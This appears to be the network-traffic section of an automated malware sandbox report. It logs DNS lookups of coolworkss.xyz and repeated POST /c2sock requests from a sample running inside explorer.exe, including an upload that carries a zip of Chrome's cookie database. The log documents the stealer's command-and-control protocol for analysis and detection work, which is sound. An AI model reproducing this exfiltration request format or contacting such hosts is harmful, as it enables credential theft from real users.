                                                                                                                                                    Sep 5, 2023 13:02:28.782212019 CEST8.8.8.8192.168.2.40x828cNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:29.522876024 CEST8.8.8.8192.168.2.40xd7a5No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:29.522876024 CEST8.8.8.8192.168.2.40xd7a5No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:30.303704023 CEST8.8.8.8192.168.2.40xf13dNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:30.303704023 CEST8.8.8.8192.168.2.40xf13dNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:31.698564053 CEST8.8.8.8192.168.2.40xfbfdNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:31.698564053 CEST8.8.8.8192.168.2.40xfbfdNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:34.695635080 CEST8.8.8.8192.168.2.40xf87No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:34.695635080 CEST8.8.8.8192.168.2.40xf87No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:35.622256041 CEST8.8.8.8192.168.2.40x283fNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:35.622256041 CEST8.8.8.8192.168.2.40x283fNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:36.358743906 CEST8.8.8.8192.168.2.40x631bNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:36.358743906 CEST8.8.8.8192.168.2.40x631bNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:37.649600029 CEST8.8.8.8192.168.2.40xbfccNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:37.649600029 CEST8.8.8.8192.168.2.40xbfccNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:38.370668888 CEST8.8.8.8192.168.2.40x9338No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:38.370668888 CEST8.8.8.8192.168.2.40x9338No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:39.096272945 CEST8.8.8.8192.168.2.40xb151No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:39.096272945 CEST8.8.8.8192.168.2.40xb151No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:39.789850950 CEST8.8.8.8192.168.2.40x2f06No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:39.789850950 CEST8.8.8.8192.168.2.40x2f06No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:40.516215086 CEST8.8.8.8192.168.2.40x19f4No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:40.516215086 CEST8.8.8.8192.168.2.40x19f4No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:41.165035009 CEST8.8.8.8192.168.2.40x961dNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:41.165035009 CEST8.8.8.8192.168.2.40x961dNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:41.837364912 CEST8.8.8.8192.168.2.40xe3f9No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:41.837364912 CEST8.8.8.8192.168.2.40xe3f9No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:42.603630066 CEST8.8.8.8192.168.2.40x990fNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:42.603630066 CEST8.8.8.8192.168.2.40x990fNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:43.416393042 CEST8.8.8.8192.168.2.40x5be2No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:43.416393042 CEST8.8.8.8192.168.2.40x5be2No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:44.179506063 CEST8.8.8.8192.168.2.40x2644No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:44.179506063 CEST8.8.8.8192.168.2.40x2644No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:45.060606956 CEST8.8.8.8192.168.2.40x5c16No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:45.060606956 CEST8.8.8.8192.168.2.40x5c16No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:45.832770109 CEST8.8.8.8192.168.2.40x9462No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:45.832770109 CEST8.8.8.8192.168.2.40x9462No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:46.580255032 CEST8.8.8.8192.168.2.40xcdbcNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:46.580255032 CEST8.8.8.8192.168.2.40xcdbcNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:47.306771040 CEST8.8.8.8192.168.2.40x386dNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:02:47.306771040 CEST8.8.8.8192.168.2.40x386dNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:03.270160913 CEST8.8.8.8192.168.2.40xcb86No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:03.270160913 CEST8.8.8.8192.168.2.40xcb86No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:04.000036001 CEST8.8.8.8192.168.2.40x343aNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:04.000036001 CEST8.8.8.8192.168.2.40x343aNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:04.855694056 CEST8.8.8.8192.168.2.40x6336No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:04.855694056 CEST8.8.8.8192.168.2.40x6336No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:05.550044060 CEST8.8.8.8192.168.2.40x14a7No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:05.550044060 CEST8.8.8.8192.168.2.40x14a7No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:06.600178003 CEST8.8.8.8192.168.2.40xec9dNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:06.600178003 CEST8.8.8.8192.168.2.40xec9dNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:08.428569078 CEST8.8.8.8192.168.2.40x5e77No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:08.428569078 CEST8.8.8.8192.168.2.40x5e77No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:09.125320911 CEST8.8.8.8192.168.2.40x4109No error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:09.125320911 CEST8.8.8.8192.168.2.40x4109No error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:10.478565931 CEST8.8.8.8192.168.2.40x429dNo error (0)coolworkss.xyz172.67.195.229A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 5, 2023 13:03:10.478565931 CEST8.8.8.8192.168.2.40x429dNo error (0)coolworkss.xyz104.21.60.111A (IP address)IN (0x0001)false
                                                                                                                                                    • wwf.org
                                                                                                                                                    • www.worldwildlife.org
                                                                                                                                                    • i.imgur.com
                                                                                                                                                    • coolworkss.xyz
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.449717104.18.6.142443C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.449718104.18.6.94443C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    10192.168.2.449744104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:28.208111048 CEST2790OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:28.209821939 CEST2790OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:28.619004965 CEST2791INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:28 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=ke5gpi0qcoihdegluu1stv46vd; expires=Sat, 30 Dec 2023 04:49:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bs5mirgAl6RvjVeb9Jocdma6dSySHUxXF4E9vpeum0lRjzZ8mr%2BHufKEN507O9mlciZsTXF6E%2Bv89w%2B6LM77w5pKOJTLDKLajcVUg3hEqBbVhLReZ13hP1ZHOfimsZsx%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfaeab8e48db5-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:28.619040012 CEST2791INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    11192.168.2.449745104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:28.913234949 CEST2792OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:28.915260077 CEST2792OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:29.344266891 CEST2793INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:29 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=r5roecc3rr696l695k5q6jqfmu; expires=Sat, 30 Dec 2023 04:49:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t%2BNmaF7mqpO5PC9lQrriwkCCQ55oBo8tw8ZBQC3VrdYBpC7YbdkeUETG0eAKPvdmJZSE%2F3Eycn4NDVRJUApKOUNFgwpmh0Ai7lCdNrnWYJg81DRu3DVuI5HyOknBSZEqJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfaef19719ab7-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:29.344326973 CEST2793INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    12192.168.2.449746104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:29.654974937 CEST2794OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:29.656461000 CEST2795OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:30.049473047 CEST2796INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:29 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=evekjm2aemliqd23mvd7hb8v2f; expires=Sat, 30 Dec 2023 04:49:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NvsflvczW6omWe5Tghi%2FrlSBndkRGZ3Qr8a67aQj6KImqOhzGiiupDpt6B4pa3cVkbE7nFUnERw3vTnR0Y3DBcOH3aRnXzziuNt5QwhCHKN7xyZr42GaNmDwcl4v4PFMXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfaf3be5d09de-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:30.049539089 CEST2796INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    13192.168.2.449747104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:30.497769117 CEST2796OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:30.498931885 CEST2797OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:30.906497002 CEST2798INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:30 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=okdsekbsrj9pprhsn71t6l23mb; expires=Sat, 30 Dec 2023 04:49:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WO1vwqjxmoMlp0MOPuqC77aS%2FuopWZwl6rmeMY4oRX7WM0spMT0%2B0MPItZ8%2FWL08abRqvnWkBlqhwUtHo4BZxA5nLC%2FgJ1fKrYKOrpRgrqHyHZVfhlorn9ltC%2BMuOM9rWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfaf90b8c3347-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:30.906534910 CEST2798INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    14192.168.2.449748172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:31.868135929 CEST2799OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:31.869343996 CEST2799OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:32.269529104 CEST2800INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:32 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=ihf5ng3tdefjnjf0tcmi4vt8eb; expires=Sat, 30 Dec 2023 04:49:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l9bSXd6%2BVWXo8dEeU5TmhSntIDpy9wD58BFLqogZDcUZCPz0dsRb9ned9U%2BJwEthpocLJa4N01i3QeKyjwfuaH4LitNqDVH%2BDU45CB0j9FscSPcyonxlxLuEPC1sbpVs4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb019c172260-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:32.269563913 CEST2800INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    15192.168.2.449749104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:34.827600956 CEST2801OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 25107
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:34.828911066 CEST2812OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:34.956255913 CEST2814OUTData Raw: af 3f 4c 3d 0d a0 c7 e8 5d d8 c0 8e 86 dd 5e 4b 5f df 4e f5 bc 3d d8 3b 7c a5 d6 b3 e3 9e cb 26 9b fb ca 19 9a 6a 0c cc 1b c7 83 af 69 b2 11 d6 ef 13 f8 2c a7 2f cd fa e7 ff 8f 9a 7e 8f 62 ae 8c 7d 34 66 77 fd ad 2b e3 b2 8e fe f9 a9 9f 9f ca 8e
                                                                                                                                                    Data Ascii: ?L=]^K_N=;|&ji,/~b}4fw+s#cgov~B2`z?3isjznN2$Hv<_rQ%;]k<mnY]q;].`w=K~>G
                                                                                                                                                    Sep 5, 2023 13:02:34.957494974 CEST2816OUTData Raw: 95 84 8f e3 22 91 5b 81 5b b1 4b 8d 6f 39 88 85 66 be 4b a2 30 b7 9d 59 f2 c6 2f 35 36 92 e5 73 35 55 98 5b 5e 5f 5f 5e 49 65 93 f3 db 5b a9 6c 6a 27 b5 ba 91 49 af af 4d 86 16 d3 8b 64 11 0b 87 22 f1 70 34 1c cd 45 0b b1 78 2c 3a 9b 59 25 b1 5c
                                                                                                                                                    Data Ascii: "[[Ko9fK0Y/56s5U[^__^Ie[lj'IMd"p4Ex,:Y%\4EH 6@lz<>.}wvDhZ`5_#EKrh{24?1r IzpwWTgi.MJ` B!n6^^-pCQV18ODRM;'CK{dzCOISOr_i~u Z
                                                                                                                                                    Sep 5, 2023 13:02:34.957562923 CEST2819OUTData Raw: a2 50 80 f5 7f 00 00 00 00 e8 3d a0 ff 07 00 00 00 80 de 03 fa 7f 00 00 00 00 e8 3d a0 ff 07 00 00 00 80 de 63 80 7d 44 e9 17 fc f4 db fe 17 00 00 00 00 00 5f 6d 2e 66 60 fe 0f 00 00 00 00 bd 47 8e 1f a0 ff 07 00 00 00 80 9e 22 27 7e 2a f4 09 e7
                                                                                                                                                    Data Ascii: P==c}D_m.f`G"'~*p.m`vF1{`q\VZq,br +RTV)rb)8JjVo?v_Y6}oi{{kS04.#j=zgax?s
                                                                                                                                                    Sep 5, 2023 13:02:34.957626104 CEST2826OUTData Raw: 00 00 70 01 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 50 68 25 57 00 00 00 00 00 00 00 00 00 00 00 00 1e 00 04 00 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 2f 4e 65 74 77 6f 72 6b 2f 43 6f 6f 6b 69 65 73 01 00 00 00 ed 9b 79 54 13 d7 1e c7 27
                                                                                                                                                    Data Ascii: pPKPh%WChrome/Default/Network/CookiesyT',aP!R0@4Ly2<*zVPR7">[7 s30sp!CYIre*Cf-` qqX4cWCp2|D{N|]
                                                                                                                                                    Sep 5, 2023 13:02:35.421880007 CEST2827INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:35 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
